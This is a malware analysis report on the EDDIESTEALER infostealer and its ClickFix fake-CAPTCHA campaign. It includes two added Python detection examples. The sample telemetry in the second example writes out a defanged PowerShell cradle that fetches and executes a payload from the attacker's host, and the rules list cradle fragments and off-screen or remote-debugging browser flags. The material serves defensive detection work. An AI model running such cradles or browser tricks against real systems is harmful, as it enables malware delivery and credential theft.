EDDIESTEALER Malware
A new malware campaign has emerged, distributing an advanced Rust-based information stealer known as EDDIESTEALER. Leveraging a clever social engineering tactic called ClickFix, attackers lure users through fake CAPTCHA verification pages to execute malicious scripts. Once active, EDDIESTEALER harvests sensitive data such as credentials, browser data, and cryptocurrency wallet details.
Infection Chain: From Fake CAPTCHA to Full-Blown Infostealer
The attack starts with legitimate websites being compromised with malicious JavaScript payloads. Visitors are shown a fake CAPTCHA page prompting them to "prove you are not a robot" via a three-step process.
The process involves:
- Opening the Windows Run dialog.
- Pasting a pre-copied command.
- Executing it to verify themselves.
This seemingly innocuous act triggers an obfuscated PowerShell command that fetches a next-stage payload from a remote server (llll[.]fit).
Payload Deployment and Stealthy Execution
The malicious JavaScript (gverify.js) is saved to the victim's Downloads folder and executed silently using cscript. This intermediate script's role is to retrieve the EDDIESTEALER binary from the same remote server, saving it with a random 12-character filename in the Downloads folder.
EDDIESTEALER is capable of:
- Collecting system metadata.
- Receiving instructions from a Command-and-Control (C2) server.
- Exfiltrating data from the infected system, including browser data, cryptocurrency wallets, password managers, FTP clients, and messaging apps.
The list of targets can be adjusted by the C2 operator. File access is handled with standard kernel32.dll functions such as CreateFileW, GetFileSizeEx, ReadFile, and CloseHandle.
Data Exfiltration and Anti-Analysis Features
After each task, the collected data is encrypted and sent to the C2 server via separate HTTP POST requests. To stay under the radar, the malware uses:
- String encryption.
- A custom WinAPI lookup mechanism to resolve API calls.
- A mutex to ensure only one instance runs.
- Checks for sandboxed environments, deleting itself if detected.
EDDIESTEALER can even delete itself by renaming NTFS Alternate Data Streams, similar to techniques used by Latrodectus malware, to bypass file locks.
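The exfiltration pattern described above, one encrypted HTTP POST per completed task to the same remote host, can be spotted on the network side without decrypting anything: a burst of POSTs from a single client to a rarely seen host whose bodies have ciphertext-like byte entropy. The Python below is an added example, not code from the report or from the malware. It runs that heuristic over constructed POST observations. The client IPs, every host other than llll[.]fit, the allowlist, and the window, count and entropy thresholds are assumptions; the ciphertext-like bodies are generated deterministically from SHA-256 only to build sample data.

```python
import hashlib
import math
from collections import Counter, defaultdict

# Destinations that legitimately receive bursts of binary uploads
# (constructed for this example; populate from your own environment).
ALLOWLISTED_HOSTS = {"intranet.corp.example"}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: close to 8.0 for ciphertext, far lower for text or JSON."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pseudo_ciphertext(seed: str, size: int = 4096) -> bytes:
    """Deterministic stand-in for an encrypted request body (SHA-256 chain).
    Only used to construct sample data; statistically it resembles ciphertext."""
    out, block = b"", seed.encode()
    while len(out) < size:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:size]


# Constructed HTTP POST observations as a network sensor might record them:
# timestamp (seconds), client IP, destination host, raw request body.
SAMPLE_POSTS = (
    # Four task results from one client to the stealer's server within 25 seconds.
    [{"ts": 1000.0 + 7 * i, "src": "10.0.0.5", "host": "llll[.]fit",
      "body": pseudo_ciphertext(f"task-{i}")} for i in range(4)]
    # A single ordinary form login (low entropy, not bursty).
    + [{"ts": 1010.0, "src": "10.0.0.7", "host": "sso.example.com",
        "body": b"username=alice&password=REDACTED&csrf=1a2b3c"}]
    # Chatty telemetry: bursty, but plaintext JSON.
    + [{"ts": 1020.0 + 5 * i, "src": "10.0.0.8", "host": "telemetry.example.com",
        "body": b'{"event":"heartbeat","seq":%d}' % i} for i in range(4)]
    # Bulk upload to an allowlisted internal host: bursty and high-entropy, but expected.
    + [{"ts": 1030.0 + i, "src": "10.0.0.9", "host": "intranet.corp.example",
        "body": pseudo_ciphertext(f"upload-{i}")} for i in range(5)]
)


def detect_exfil_bursts(posts, window=60.0, min_posts=3, min_entropy=7.0):
    """Flag (client, host) pairs that send at least `min_posts` POSTs inside a
    `window`-second span to a non-allowlisted host, with ciphertext-like bodies."""
    groups = defaultdict(list)
    for p in posts:
        if p["host"] not in ALLOWLISTED_HOSTS:
            groups[(p["src"], p["host"])].append(p)

    alerts = []
    for (src, host), items in groups.items():
        items.sort(key=lambda p: p["ts"])
        # Largest number of POSTs inside any sliding window (two-pointer scan).
        best, start = 0, 0
        for end in range(len(items)):
            while items[end]["ts"] - items[start]["ts"] > window:
                start += 1
            best = max(best, end - start + 1)
        mean_entropy = sum(shannon_entropy(p["body"]) for p in items) / len(items)
        if best >= min_posts and mean_entropy >= min_entropy:
            alerts.append({"src": src, "host": host, "posts": best,
                           "mean_entropy": round(mean_entropy, 2)})
    return alerts


if __name__ == "__main__":
    for alert in detect_exfil_bursts(SAMPLE_POSTS):
        print(alert)
```

Only the llll[.]fit group trips both conditions: the telemetry burst fails the entropy check and the internal upload is excluded by the allowlist. In production, add a minimum body size so that tiny beacons do not distort the entropy average, and feed the host into a first-seen or domain-age lookup rather than relying on a static allowlist alone.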
Chromium Exploitation with ChromeKatz
One of the malware's most concerning features is its ability to bypass Chromium's app-bound encryption. It integrates a Rust implementation of ChromeKatz, an open-source tool designed to dump cookies and credentials from Chromium-based browsers.
If the targeted browser isn't running, EDDIESTEALER launches a hidden browser instance with the command line --window-position=-3000,-3000 https://google.com. This allows it to access memory associated with the --utility-sub-type=network.mojom.NetworkService child process, ultimately extracting credentials.
Expanded Capabilities in Updated Variants
Recent versions of EDDIESTEALER can also gather:
- Running processes.
- GPU details.
- Number of CPU cores, CPU name, and vendor.
- System information (sent to the server even before task configuration).
Additionally, the encryption key used for client-to-server communication is hard-coded into the binary, enhancing operational security. The stealer can also launch a new Chrome process with --remote-debugging-port= set, enabling headless interaction with the browser over the DevTools Protocol with no user interaction required.
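The command lines quoted in this report are the most direct detection surface for the whole chain: the paste-and-run PowerShell cradle launched from the Run dialog (Infection Chain section), cscript executing gverify.js out of Downloads and the randomly named 12-character binary it drops (Payload Deployment section), and the off-screen --window-position browser launch and --remote-debugging-port= start described in the two sections above. The Python below is an added example, not code from the report or from the malware, that evaluates those checks over constructed Sysmon-style process-creation records. The user name, file paths, the 12-character file name and the debugging port value are invented, the payload path on llll[.]fit is a placeholder because the report does not give it, and the indicator fragments and thresholds are illustrative and need tuning for your environment.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record, modelled on Sysmon Event ID 1 fields."""
    event_id: int
    parent_image: str
    image: str
    command_line: str


CHROMIUM_BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "chromium.exe"}
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Fragments typical of a paste-and-run ClickFix cradle. Two or more together
# trigger the rule; any one alone is common in legitimate admin scripting.
PS_INDICATORS = ("-w hidden", "-windowstyle hidden", "-enc", "iex ", "iex(",
                 "invoke-expression", "iwr ", "invoke-webrequest",
                 "downloadstring", "http")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_clickfix_powershell(ev: ProcessEvent) -> bool:
    """PowerShell spawned by explorer.exe (the Run dialog) with hidden-window and download-cradle flags."""
    if basename(ev.parent_image) != "explorer.exe" or basename(ev.image) not in POWERSHELL:
        return False
    cl = ev.command_line.lower()
    return sum(ind in cl for ind in PS_INDICATORS) >= 2


JS_IN_DOWNLOADS = re.compile(r"\\downloads\\[\w.-]+\.js\b", re.I)


def rule_script_host_js_from_downloads(ev: ProcessEvent) -> bool:
    """cscript/wscript running a .js file straight out of the Downloads folder."""
    return basename(ev.image) in SCRIPT_HOSTS and JS_IN_DOWNLOADS.search(ev.command_line) is not None


RANDOM_EXE_IN_DOWNLOADS = re.compile(r"\\downloads\\[a-z0-9]{12}\.exe$", re.I)


def rule_random_named_binary(ev: ProcessEvent) -> bool:
    """A script host launching a 12-character random-named .exe from Downloads."""
    return (basename(ev.parent_image) in SCRIPT_HOSTS
            and RANDOM_EXE_IN_DOWNLOADS.search(ev.image) is not None)


OFFSCREEN_WINDOW = re.compile(r"--window-position=-\d+,-\d+")


def rule_offscreen_browser(ev: ProcessEvent) -> bool:
    """Chromium browser placed at negative screen coordinates, invisible to the user."""
    return basename(ev.image) in CHROMIUM_BROWSERS and OFFSCREEN_WINDOW.search(ev.command_line) is not None


def rule_remote_debugging_port(ev: ProcessEvent) -> bool:
    """Chromium browser started with the DevTools remote-debugging port enabled."""
    return basename(ev.image) in CHROMIUM_BROWSERS and "--remote-debugging-port=" in ev.command_line.lower()


RULES = {
    "clickfix_powershell_from_run_dialog": rule_clickfix_powershell,
    "script_host_js_from_downloads": rule_script_host_js_from_downloads,
    "random_named_binary_in_downloads": rule_random_named_binary,
    "offscreen_browser_window": rule_offscreen_browser,
    "browser_remote_debugging_port": rule_remote_debugging_port,
}


def detect(events):
    """Return (rule_name, event_id) pairs for every event that trips a rule."""
    return [(name, ev.event_id) for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed sample telemetry, not real logs. Paths, the user name, the
# 12-character file name and the debugging port are invented; the payload
# path on llll[.]fit is a placeholder because the report does not give it.
STEALER = r"C:\Users\alice\Downloads\aB3dE9fGh1Jk.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
POWERSHELL_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(1, r"C:\Windows\explorer.exe", POWERSHELL_EXE,
                 'powershell.exe -w hidden -NoProfile -Command "iex (iwr hxxp://llll[.]fit/PLACEHOLDER_PATH)"'),
    ProcessEvent(2, POWERSHELL_EXE, r"C:\Windows\System32\cscript.exe",
                 r'cscript.exe //nologo "C:\Users\alice\Downloads\gverify.js"'),
    ProcessEvent(3, r"C:\Windows\System32\cscript.exe", STEALER, f'"{STEALER}"'),
    ProcessEvent(4, STEALER, CHROME, f'"{CHROME}" --window-position=-3000,-3000 https://google.com'),
    ProcessEvent(5, STEALER, CHROME, f'"{CHROME}" --remote-debugging-port=9222'),
    # Benign: a user opening PowerShell from the Start menu, and a normal Chrome start.
    ProcessEvent(6, r"C:\Windows\explorer.exe", POWERSHELL_EXE, f'"{POWERSHELL_EXE}"'),
    ProcessEvent(7, r"C:\Windows\explorer.exe", CHROME, f'"{CHROME}" --profile-directory=Default'),
]

if __name__ == "__main__":
    for name, event_id in detect(SAMPLE_EVENTS):
        print(f"event {event_id}: {name}")
```

The two-indicator threshold in the PowerShell rule is what keeps ordinary console launches from explorer.exe quiet; the browser rules key on the flags alone because neither an off-screen window position nor a remote-debugging port has a routine reason to appear on an interactive user's browser, so they are worth alerting on even without the parent-process context.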
Cross-Platform ClickFix Campaign
The use of Rust for EDDIESTEALER highlights a growing trend among malware developers, leveraging modern language features for stealth, stability, and evasion of detection.
This campaign is part of a broader effort by attackers to leverage ClickFix tactics across multiple platforms. Researchers at c/side have observed similar attacks targeting macOS, Android, and iOS. For macOS, the malicious JavaScript redirects to a page instructing victims to run a Terminal shell script, deploying the Atomic macOS Stealer (AMOS).
For Android, iOS, and Windows visitors, a drive-by download scheme deploys a separate Trojan malware, making this a highly versatile and cross-platform threat.
Conclusion
The EDDIESTEALER campaign demonstrates the effectiveness of social engineering combined with sophisticated malware development. Its advanced Rust-based core, cross-platform adaptability, and ability to bypass browser protections highlight the growing need for organizations and individuals to remain vigilant and proactive in their cybersecurity posture.